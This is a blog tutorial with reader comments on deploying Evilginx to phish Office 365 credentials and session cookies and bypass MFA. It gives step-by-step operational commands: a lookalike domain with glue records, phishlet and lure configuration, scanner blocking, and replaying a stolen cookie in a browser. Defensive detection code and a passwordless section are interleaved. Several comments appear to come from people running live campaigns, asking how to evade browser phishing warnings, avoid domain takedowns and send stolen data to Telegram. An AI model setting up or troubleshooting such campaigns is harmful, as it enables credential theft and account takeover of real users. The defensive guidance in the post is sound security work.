
How to set up Evilginx to phish Office 365 credentials

Disclaimer
Evilginx can be used for nasty stuff. It is the defender's responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attacks. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties, or for educational purposes.

That being said: on with the show. Today a step-by-step tutorial on how to set up Evilginx and how to use it to phish for Office 365 or Azure Active Directory credentials. After reading this post, you should be able to spin up your own instance and do the basic configuration to get started.

Update 21-10-2022: Because of the high number of comments from folks having issues, I created a quick tutorial where I ran through the steps.

What is Evilginx?

Evilginx is a man-in-the-middle attack framework used for phishing credentials along with session cookies, which can then be used to bypass 2-factor authentication protection. The framework uses so-called phishlets to mirror a website and trick users into entering their credentials, for example for Office 365, Gmail, or Netflix. Since it is open source, many phishlets are available, ready to use. Today, we focus on the Office 365 phishlet, which is included in the main version.

What do we need?

So, in order to get this piece up and running, we need a couple of things:

  • an internet-facing VPS or VM running Linux. Evilginx runs very well on the most basic Debian 8 VPS.
  • a domain name that is used for phishing, and access to the DNS config panel
  • a target domain in Office 365 that is using password hash sync or cloud-only accounts. (ADFS is also supported but is not covered in detail in this post)

I also want to point out that the default documentation on Github is very helpful. Also check the issues page if you have additional questions, or run into problems during installation or configuration. This post is based on Debian Linux, but it might also work with other distros.

Step 1 – Spin up the VPS

First, we need a VPS or droplet of your choice. I found one at Vimexx for a couple of bucks per month.

Select Debian as your operating system, and you are good to go.

As soon as your VPS is ready, take note of the public IP address. We need that in our next step.

Step 2 – Domain & DNS glue records

Next, we need our phishing domain. I bought one at TransIP: miicrosofttonline.com

The easiest way to get this working is to set glue records for the domain that point to your VPS. Not all providers allow you to do that, so reach out to the support folks if you need help. Check here if you need more guidance.

If your domain is also hosted at TransIP, unselect the default TransIP-settings toggle, and change the nameservers to ns1.yourdomain.com and ns2.yourdomain.com. Next, ensure that the IPv4 records are pointing towards the IP of your VPS.
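From the defender's side, a lookalike domain such as miicrosofttonline.com is exactly what DNS and web-proxy log monitoring should surface before any user reaches it. The following is an added example, not code from this post or from Evilginx: it scans DNS query log lines for registrable domains whose second-level label is within a small edit distance of a brand watchlist, after undoing common typosquat tricks (doubled letters, digit homoglyphs, "rn" for "m"). The log format, the watchlist and the sample lines are constructed for the example.

```python
"""Flag lookalike (typosquat) domains in DNS query logs.

Added example for this post, not part of Evilginx or the author's setup.
Assumptions: the log format (timestamp, client IP, queried name), the brand
watchlist and the sample lines below are all constructed for the example.
"""
import re

# Brands we care about, as registrable domains (constructed watchlist).
WATCHLIST = ["microsoftonline.com", "microsoft.com", "office.com", "live.com"]

# Constructed DNS query log: "<timestamp> <client-ip> <queried-name>".
SAMPLE_LOG = """\
2022-10-21T09:00:01Z 10.0.0.12 login.microsoftonline.com
2022-10-21T09:00:05Z 10.0.0.12 login.miicrosofttonline.com
2022-10-21T09:01:10Z 10.0.0.33 www.example.org
2022-10-21T09:02:00Z 10.0.0.33 portal.office.com
2022-10-21T09:03:00Z 10.0.0.47 www.microsioft.live
"""

MAX_DISTANCE = 2  # edit distance at or below which a label counts as a lookalike


def levenshtein(a: str, b: str) -> int:
    """Plain dynamic-programming edit distance (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(label: str) -> str:
    """Undo common typosquat tricks before comparing: 'rn' for 'm', 'vv' for 'w',
    digit homoglyphs (0/1/3/5) and doubled letters ('miicrosofttonline')."""
    label = label.lower().replace("rn", "m").replace("vv", "w")
    label = label.translate(str.maketrans("0135", "oles"))
    return re.sub(r"(.)\1+", r"\1", label)


def registrable(qname: str) -> str:
    """Last two labels of the name. Approximation: a production tool should use
    the public suffix list so that names like example.co.uk are handled correctly."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def closest_brand(domain: str):
    """Return (brand, distance) for the nearest watchlist brand, comparing the
    normalized second-level labels. An exact brand match returns distance 0 so
    the caller can tell 'genuine' from 'lookalike' via registrable()."""
    reg = registrable(domain)
    sld = normalize(reg.split(".")[0])
    best = None
    for brand in WATCHLIST:
        d = 0 if reg == brand else levenshtein(sld, normalize(brand.split(".")[0]))
        if best is None or d < best[1]:
            best = (brand, d)
    return best


def is_lookalike(domain: str) -> bool:
    brand, d = closest_brand(domain)
    return registrable(domain) != brand and d <= MAX_DISTANCE


def scan_log(text: str):
    """Return (client_ip, qname, brand, distance) for every lookalike query."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        _ts, client, qname = parts
        if is_lookalike(qname):
            brand, d = closest_brand(qname)
            hits.append((client, qname, brand, d))
    return hits


if __name__ == "__main__":
    for client, qname, brand, d in scan_log(SAMPLE_LOG):
        print(f"{client} queried {qname} (looks like {brand}, distance {d})")
```

On the sample log this flags login.miicrosofttonline.com (distance 0 from microsoftonline.com once the doubled letters are collapsed) and www.microsioft.live (distance 1 from microsoft.com), and leaves the genuine names alone. A short watchlist entry like live.com will produce false positives against ordinary four-letter labels, so tune MAX_DISTANCE per brand or require a minimum label length in practice.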

Step 3 – Install Evilginx

Next, we need to install Evilginx on our VPS. So to start off, connect to your VPS. I use ssh with the Windows terminal to connect, but some providers offer a web-based console as well.

First, we need to make sure wget is installed:

sudo apt update 

sudo apt install wget -y

Next, download the Go installation files:

wget https://golang.org/dl/go1.17.linux-amd64.tar.gz

Install Go by running this command:

sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/

Next, we need to configure the PATH environment variable by running:

echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh

source /etc/profile.d/go.sh

The source files are from my personal Github page. This version includes an updated YAML file for the o365 phishlet, since the original one does not capture the session token, and does not support KMSI and Temporary Access Pass. If you don't feel comfortable pulling it from my Github, change the path to https://github.com/kgretzky/evilginx2.git to pull it from the original source. You will then need to manually edit the Office 365 phishlet (located in /usr/share/evilginx/phishlets) and replace it with this file.

Run the following cmdlets to clone the source files from Github:

sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make

After that, we can install Evilginx globally and run it:

sudo make install
sudo evilginx

We now have Evilginx running, so in the next step, we take care of the configuration.

A couple of handy cmdlets that you might need along the way:

Action                               Command
Start Evilginx                       sudo evilginx
Close Evilginx                       exit
Get the phishing URL                 lures get-url <id>
Get the running config               config
See all phishlets                    phishlets
See all sessions                     sessions
Get details from a specific session  sessions <id>
Clear screen                         clear
Hide the Office 365 phishlet         phishlets hide o365
Unhide the Office 365 phishlet       phishlets unhide o365
Take note of the locations for phishlets and config files

Step 4 – Configure Evilginx

Okay, this is the last step to get Evilginx up and running.
First, we need to set the domain and IP (replace the domain and IP with your own values!).
Optionally, set the blacklist to unauth to block scanners and unwanted visitors. This is highly recommended.

config domain <yourdomain>
config ip <yourIP>
blacklist unauth

Next, we configure the Office 365 phishlet to match our domain:

phishlets hostname o365 <yourdomain>
phishlets enable o365

If you get an SSL/TLS error at this point, your DNS records are not (yet) in place. When a phishlet is enabled, Evilginx requests a free SSL certificate from LetsEncrypt for the new domain, which requires the domain to be reachable. As soon as the new SSL certificate is active, you can expect some traffic from scanners! If you changed the blacklist to unauth earlier, these scanners will be blocked.

In the next step, we are going to set the lure for Office 365 phishlet and also set the redirect URL. This URL is used after the credentials are phished and can be anything you like. In this case, we use https://portal.office.com/.

lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0

Our phishlet is now active and can be accessed via the URL https://login.miicrosofttonline.com/tHKNkmJt (no longer active).

Requests that use the URL from the lure are treated as an ‘authenticated’ session and are therefore not blocked.

At this point, you can also deactivate your phishlet by hiding it.

phishlets hide o365

To unhide the phishlet, simply run:

phishlets unhide o365

At all times within the application, you can run help or help <command> to get more information on the cmdlets.

Fun fact: the default redirect URL is a funny cat video that you definitely should check out: https://www.youtube.com/watch?v=dQw4w9WgXcQ

Capture MFA protected session

Okay, time for action. Let’s see how this works.

In this video, session details are captured using Evilginx. The session is protected with MFA, and the user has a very strong password.

  1. User enters the phishing URL, and is provided with the Office 365 sign-in screen.
  2. Username is entered, and company branding is pulled from Azure AD.
  3. User provides password.
  4. User is prompted for MFA.
  5. User is prompted for KMSI cookie.
  6. User is redirected to the redirect URL.
  7. Credentials and session token are captured.

If you try to phish a non-Office 365 account, you’ll get this error:

We’re unable to complete your request

invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application.

Replay stolen token

In this video, the captured token is imported into Google Chrome.

  1. Browse to https://portal.office.com.
  2. No user is signed in.
  3. Cookie is deleted using the browser extension.
  4. Cookie is copied from Evilginx, and imported into the session.
  5. After a page refresh the session is established, and MFA is bypassed.
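The two videos above show the same session cookie being minted during the proxied sign-in and then presented again from the attacker's browser. On the defender's side that is a detectable pattern in sign-in logs: one session identifier used from more than one source IP shortly after the MFA-satisfied sign-in that created it. The block below is an added example, not Microsoft's or Evilginx's code; the record layout (time, user, ip, session, mfa) and the sample sign-ins are constructed, and you would map them onto the session ID, IP address and MFA-result fields your own sign-in log exports.

```python
"""Detect a session cookie being reused from a second network location.

Added example for this post, not Microsoft's or Evilginx's code. The record
layout (time, user, ip, session, mfa) and the sample sign-ins are constructed;
map them onto the session ID, IP and MFA fields your own sign-in log exports.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in events. "interactive" = the user satisfied MFA in this
# sign-in; "token" = MFA was satisfied by an existing session or token.
SIGNINS = [
    {"time": "2022-10-21T09:05:00Z", "user": "alice@contoso.example",
     "ip": "203.0.113.10", "session": "s-1", "mfa": "interactive"},
    {"time": "2022-10-21T09:07:30Z", "user": "alice@contoso.example",
     "ip": "198.51.100.7", "session": "s-1", "mfa": "token"},
    {"time": "2022-10-21T09:10:00Z", "user": "bob@contoso.example",
     "ip": "203.0.113.22", "session": "s-2", "mfa": "interactive"},
    {"time": "2022-10-21T11:30:00Z", "user": "bob@contoso.example",
     "ip": "203.0.113.22", "session": "s-2", "mfa": "token"},
]


def parse_time(s: str) -> datetime:
    # fromisoformat() only accepts a trailing "Z" from Python 3.11 on.
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def find_session_replay(records, window=timedelta(hours=1)):
    """Flag sessions whose cookie/token is presented from a source IP other than
    the one that performed the interactive sign-in, within `window` of that
    sign-in. Returns one finding dict per suspicious session."""
    by_session = defaultdict(list)
    for r in records:
        by_session[r["session"]].append(r)

    findings = []
    for session, events in by_session.items():
        events.sort(key=lambda r: parse_time(r["time"]))
        # The interactive sign-in is the reference point; fall back to the first event.
        origin = next((e for e in events if e["mfa"] == "interactive"), events[0])
        t0 = parse_time(origin["time"])
        for e in events:
            gap = parse_time(e["time"]) - t0
            if e["ip"] != origin["ip"] and timedelta(0) <= gap <= window:
                findings.append({
                    "user": e["user"], "session": session,
                    "signin_ip": origin["ip"], "replay_ip": e["ip"],
                    "minutes_after_signin": int(gap.total_seconds() // 60),
                })
                break  # one finding per session is enough for triage
    return findings


if __name__ == "__main__":
    for f in find_session_replay(SIGNINS):
        print(f"{f['user']}: session {f['session']} signed in from {f['signin_ip']} "
              f"then reused from {f['replay_ip']} after {f['minutes_after_signin']} min")
```

Note the caveat that follows from how a reverse proxy works: the interactive sign-in itself is sourced from the proxy VPS, not from the victim's network, so the "sign-in IP" in the finding is already attacker infrastructure. The rule therefore catches the cookie being imported on a different machine (as in the video) but misses a replay from the same VPS; pair it with unfamiliar-location and impossible-travel alerts, and with the phishing-resistant methods recommended at the end of the post.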

What if the target is using ADFS?

If the target domain is using ADFS, you should update the YAML file with the corresponding ADFS domain information.

cd /
cd usr/share/evilginx/phishlets/
sudo nano o365.yaml

How to protect your Office 365 credentials

Okay, now on to the stuff that really matters: how do you prevent phishing? You can do a lot to protect your users from being phished. Please refer to my previous post on this very subject to learn more:

10 tips to secure your identities in Microsoft 365 – JanBakker.tech

I want to point out one specific tip: go passwordless as soon as possible, either by using Windows Hello for Business, FIDO2 keys, or passkeys (Microsoft Authenticator app). If you still rely on Azure MFA, please consider using FIDO2 keys as your MFA method: Use a FIDO2 security key as Azure MFA verification method – JanBakker.tech
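The reason FIDO2 keys and passkeys hold up where a password plus an MFA code does not is origin binding: the browser records the origin of the page that requested the assertion in clientDataJSON, the authenticator scopes the credential to the relying party ID, and the relying party checks both before it even looks at the signature. A proxied page on a lookalike domain therefore produces an assertion the real service rejects. The block below is an added example, not Microsoft's WebAuthn implementation; the expected origin, RP ID, challenge and the helper that fabricates a browser's clientDataJSON are constructed for the demonstration, and signature verification over authenticatorData || SHA-256(clientDataJSON) is deliberately left out because it needs the credential's registered public key and adds nothing to the origin check being shown.

```python
"""Why FIDO2/passkeys resist a reverse-proxy phish: the relying party checks the
origin and RP ID the browser recorded, not just the signature.

Added example, not Microsoft's WebAuthn implementation. The expected origin,
RP ID, challenge and the helper that fabricates clientDataJSON are constructed.
Signature verification is omitted (it needs the credential's public key).
"""
import base64
import hashlib
import json

EXPECTED_ORIGIN = "https://login.microsoftonline.com"  # constructed: the genuine RP origin
RP_ID = "login.microsoftonline.com"                     # constructed: the genuine RP ID
CHALLENGE = "c2VydmVyLWNoYWxsZW5nZS0xMjM"              # constructed server challenge (base64url)

FLAG_USER_PRESENT = 0x01


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def browser_client_data(origin: str, challenge: str = CHALLENGE) -> str:
    """Constructed stand-in for the clientDataJSON a browser builds for
    navigator.credentials.get(). The browser fills in the origin from the page
    the user is actually on; page script cannot override it."""
    return b64url_encode(json.dumps({
        "type": "webauthn.get", "challenge": challenge,
        "origin": origin, "crossOrigin": False,
    }).encode())


def authenticator_data(rp_id: str, counter: int = 1) -> bytes:
    """Constructed authenticatorData: SHA-256(rpId) || flags || 4-byte counter.
    The browser only permits an rpId that is a registrable suffix of the page's
    own domain, so a page on a lookalike domain cannot ask for the genuine RP ID."""
    return (hashlib.sha256(rp_id.encode()).digest()
            + bytes([FLAG_USER_PRESENT]) + counter.to_bytes(4, "big"))


def verify_assertion(client_data_b64: str, auth_data: bytes,
                     expected_challenge: str = CHALLENGE,
                     expected_origin: str = EXPECTED_ORIGIN,
                     rp_id: str = RP_ID):
    """Relying-party checks that WebAuthn requires before signature verification.
    Returns (ok, reason)."""
    try:
        cd = json.loads(b64url_decode(client_data_b64))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return False, "clientDataJSON not decodable"
    if cd.get("type") != "webauthn.get":
        return False, "type mismatch"
    if cd.get("challenge") != expected_challenge:
        return False, "challenge mismatch (possible replay)"
    if cd.get("origin") != expected_origin:
        return False, f"origin mismatch: {cd.get('origin')}"
    if len(auth_data) < 37:
        return False, "authenticatorData too short"
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & FLAG_USER_PRESENT:
        return False, "user presence flag not set"
    return True, "ok"


if __name__ == "__main__":
    # Genuine sign-in: browser on the real origin, authenticator scoped to the real RP ID.
    print(verify_assertion(browser_client_data(EXPECTED_ORIGIN), authenticator_data(RP_ID)))
    # Proxied sign-in: the browser is on the lookalike domain from this post, so the
    # clientDataJSON it produces carries that origin and the RP rejects it. The
    # signature covers clientDataJSON, so the proxy cannot rewrite that field in transit.
    phish = "https://login.miicrosofttonline.com"
    print(verify_assertion(browser_client_data(phish), authenticator_data(RP_ID)))
    # Independently, an authenticator scoped to the lookalike RP ID yields a
    # different rpIdHash, which fails as well.
    print(verify_assertion(browser_client_data(EXPECTED_ORIGIN),
                           authenticator_data("login.miicrosofttonline.com")))
```

This is also why the commenter below who tried "Sign in with a security key" through the proxy could not complete it: the exchange is bound to the origin the browser is really on, and there is no cookie or code for the proxy to relay that would satisfy the genuine relying party.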

More community resources:
Why using a FIDO2 security key is important – Cloudbrothers
Protect against AiTM/ MFA phishing attacks using Microsoft technology (jeffreyappel.nl)

Stay safe!

59 thoughts on “How to set up Evilginx to phish Office 365 credentials”

  1. Pingback: [m365weekly] #82 - M365 Weekly Newsletter

  2. Can use regular O365 auth but not 2FA tokens. I get an Invalid postback url error in the Microsoft login context. That usually works with the kgretzky build.

        1. Hey Jan, thanks for the reply… I tried with another server and followed these exact same steps, but I am having problems getting SSL for the subdomains login and www. I’m guessing it has to do with name server propagation.

          Regards

          1. I think this has to do with DNS. Did you use glue records? Try adding both www and login A records, and point them to your VPS. (might take some time)

    1. Hi Matt, try adding the following to your o365.yaml file

      - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoft.com', session: true, is_landing: true}

  3. invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application.

  4. Thanks for the writeup. Unfortunately, I can’t seem to capture the token (with the file from your github site). Is there a piece of configuration not mentioned in your article?

    Thanks again!

    1. That’s odd. Are you sure you have edited the right one? Take a look at the location where Evilginx is getting the YAML files from. You can see that when you start Evilginx

    1. The redirect URL of the lure is the one the user will see after the phish. The Rickroll video, is the default URL for hidden phishlets or blacklist.

      Type help config to change that URL. config redirect_url

      1. Yes, but the lure link doesn’t show me the login page, it just redirects to the video. No login page, nothing. It only showed the login page once and after that it keeps redirecting.

  5. I have my own custom domain. I have the DNS records pointing to the correct IP (I can spin up a Python simple HTTP server and access it). I made evilginx from source on an updated Manjaro machine. I get no error when starting up evilginx2 with sudo (no issues with any of the ports). I set up the config (domain and ip) and set up a phishlet (outlook for this example). I set up the phishlet address with either just the base domain, or with a subdomain; I get the same results with either option. I enable the phishlet, receive that it is setting up certificates, and in green I get confirmation of certificates for the domain.

    When I visit the domain, I am taken straight to the Rick Youtube video. No glimpse of a login page, and no invalid cert message. In the Evilginx terminal I get an error of an unauthorized request to the domain in question that I visited with reference to the correct browser. I have tried access with different browsers as well as different IPs same result.

    What am I not setting up correctly?

    Thank you

    1. Hi Raph, this can either mean that the phishlet is hidden or disabled, or that your IP is blacklisted. Make sure you are using the right URL, received from lures get-url

      You can find the blacklist in the root of the Evilginx folder. Please check if your WAN IP is listed there. While testing, that sometimes happens…

  6. Oh, thanks. Actually I figured out after two days of total frustration that the issue was that I didn’t start up evilginx with ‘SUDO’. Unbelievable error, but I figured it out and that is all that mattered.

  7. Hi Jan, how are you?

    Do you have any documented process to link webhook so as to get captured data in email or telegram?

    Also, why is the phishlet not capturing cookies but only username and password?

  8. Hey Jan – using the Phishlet, works as expected for capturing credentials as well as the session tokens. However when you attempt to “Sign in with a security key” there is a redirection which leads to a

    “ADSTS135004 Invalid PostbackUrlParameter”

    This prevents the demonstration of authenticating with a Security Key to validate origin binding control of FIDO2.

    Any ideas?

    1. Hi Shak, try adding the following to your o365.yaml file

      - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoft.com', session: true, is_landing: true}

      1. Hi, I noticed that the line was added to the github phishlet file. Sadly I am still facing the same “ADSTS135004 Invalid PostbackUrl Parameter” error when trying fido2 signin even with the added phish_sub line.

  9. Hi Jan,

    I tried with the new o365 YAML but still I am unable to get the session token.

    Sometimes it’s intercepting the username and password, but sometimes after MFA it’s stuck on the same page and not redirecting to the original page.

    I applied the configuration “lures edit 0 redirect_url https://portal.office.com”

    Microsoft
    Sign in
    There was an issue looking up your account. Tap Next to try again.

    1. Same question as Scott – updating the YAML file to remove placeholders breaks capture entirely – an example of proper formatting would be very helpful.

  10. [outlook.microsioft.live] acme: error: 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVcheck that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for outlook.microsioft.live – check that a DNS record exists for this domain, url:

    1. Hi Thad, this issue seems DNS related. You need to add both IPv4 and IPv6 A records for outlook.microsioft.live
      Better: use glue records

  11. Hey Jan – any idea how you can include Certificate Based Authentication as part of one of the “prevention” scenarios? Seems when you attempt to log in with Certificate, there is a redirect to certauth.login.domain.com. in addition to DNS records it seems we would need to add certauth.login.domain.com to the certificate? Let me know your thoughts.

  12. Please help

    [07:50:57] [inf] requesting SSL/TLS certificates from LetsEncrypt…
    [07:50:57] [!!!] get directory at ‘https://acme-v02.api.letsencrypt.org/directory’: Get “https://acme-v02.api.letsencrypt.org/directory”: dial tcp: lookup acme-v02.api.letsencrypt.org: Temporary failure in name resolution
    [07:50:57] [inf] disabled phishlet ‘o365’

  13. I have been trying to setup evilginx2 since quite a while but was failing at one step. Can you please help me out?

    1) My free cloud server IP 149.248.1.155 (Ubuntu Server) hosted in Vultr.

    2) Domain microsoftaccclogin.cf and DNS pointing to my 149.248.1.155.

    3) URL (www.microsoftaccclogin.cf) is also loading.

    4) Getting the following error even after using https://github.com/BakkerJan/evilginx2.git which has updated o365 phishlet.

    [12:44:22] [!!!] acme: Error -> One or more domains had a problem:
    [login.microsoftaccclogin.cf] acme: error: 400 :: urn:ietf:params:acme:error:dns :: DNS problem: NXDOMAIN looking up A for login.microsoftaccclogin.cf – check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for login.microsoftaccclogin.cf – check that a DNS record exists for this domain, url:
    [www.microsoftaccclogin.cf] acme: error: 403 :: urn:ietf:params:acme:error:unauthorized :: 149.248.1.155: Invalid response from http://www.microsoftaccclogin.cf/.well-known/acme-challenge/QQ1IwQLmgAhk4NLQYkhgHfJEFi38w11sDrgiUL8Up3M: 404, url:

    I have checked my DNS records and they are configured correctly. I hope you can help me with this issue! I am a noob in cybersecurity just trying to learn more.

  14. I was able to set it up right, but once I give the user ID and password on the Microsoft page it gives me the below error. I have used your github clone https://github.com/BakkerJan/evilginx2.git

    invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application

    Also my domain is getting blocked and taken down in 15 minutes. In the domain admin panel it’s showing fraud. Maybe some online scanners were reporting my domain as fraud. How can I get rid of this domain blocking issue and also resolve that “invalid_request” error?
    Please help me! Thank you.

  15. I got the phishing url up and running but getting the below error

    “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    Was something changed on Microsoft’s end?
    Below is my config:

    config domain jamitextcheck.ml
    config ip 107.191.48.124
    blacklist unauth

    phishlets hostname o365 jamitextcheck.ml
    phishlets enable o365

    lures create o365

    lures edit 0 redirect_url https://login.live.com/
    also tried with lures edit 0 redirect_url https://portal.office.com

    lures get-url 0

  16. I have tried everything the same; after giving the username on the phishing page, the below was the error:

    “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    Can you please help me?

  17. I have watched your recent video on YouTube and still get the below error after giving the username:

    “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    Can you please help me?

    1. What’s your target? This error is also shown if you use Microsoft MSA accounts like outlook.com or live.com
      You can only use this with Office 365 / Azure AD tenants.

  18. For all that have the “invalid_request: The provided value for the input parameter ‘redirect_uri’ is not valid. The expected value is a URI which matches a redirect URI registered for this client application”

    This error occurs when you use an account without a valid o365 subscription. A basic *@outlook.com won’t work.

    1. Thanks, that’s correct. Just tested that, and added it to the post.
      You’ll need the Outlook phishlet for that, as this one is using other URLs.

  19. Failed to start nameserver on port 53
    listen tcp :443: bind: address already in use

    Please, can I fix this problem? I did everything and it worked perfectly before I encountered the above problem. I have tried to install apache to stop the port but it’s not working. Please, how do I resolve this? I do not mind giving you a few bitcoin.

    Thank you

  20. Hello, thanks for this post

    Sorry, but your post is not working for me… my DNS is configured correctly and I always have the same issue:

    acme: Error -> One or more domains had a problem:
    [login.loginauth.mscloudsec.com] acme: error: 400 :: urn:ietf:params:acme:error:dns :: DNS problem: NXDOMAIN looking up A for login.loginauth.mscloudsec.com – check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for login.loginauth.mscloudsec.com – check that a DNS record exists for this domain, url:
    [www.loginauth.mscloudsec.com] acme: error: 400 :: urn:ietf:params:acme:error:connection :: 20.65.97.63: Fetching http://www.loginauth.mscloudsec.com/.well-known/acme-challenge/y5aoNnpkHLhrq13znYMd5w5Bb44bGJPikCKr3R6dgdc: Timeout during connect (likely firewall problem), url:

    please could you share exactly the good DNS configuration ?

  21. Hi Jan,
    Evilginx is working perfect for me. However, it gets detected by Chrome, Edge browsers as Phishing.

    Error message from Edge browser -> “The server presented a certificate that wasn’t publicly disclosed using the Certificate Transparency policy. This is required for some certificates to make sure they are trustworthy and to protect against attackers.”

    Is there any way to get around this?

  22. Hello, I need some help. I did all the steps correctly, but whenever I go to the lure URL that was provided I’m taken straight to the rick roll video; the link doesn’t even take me to the phishlet landing page?? Does anyone know why it does this, or did I do something wrong in the configuration setup in evilginx2?? Your feedback will be greatly appreciated. Thank you.
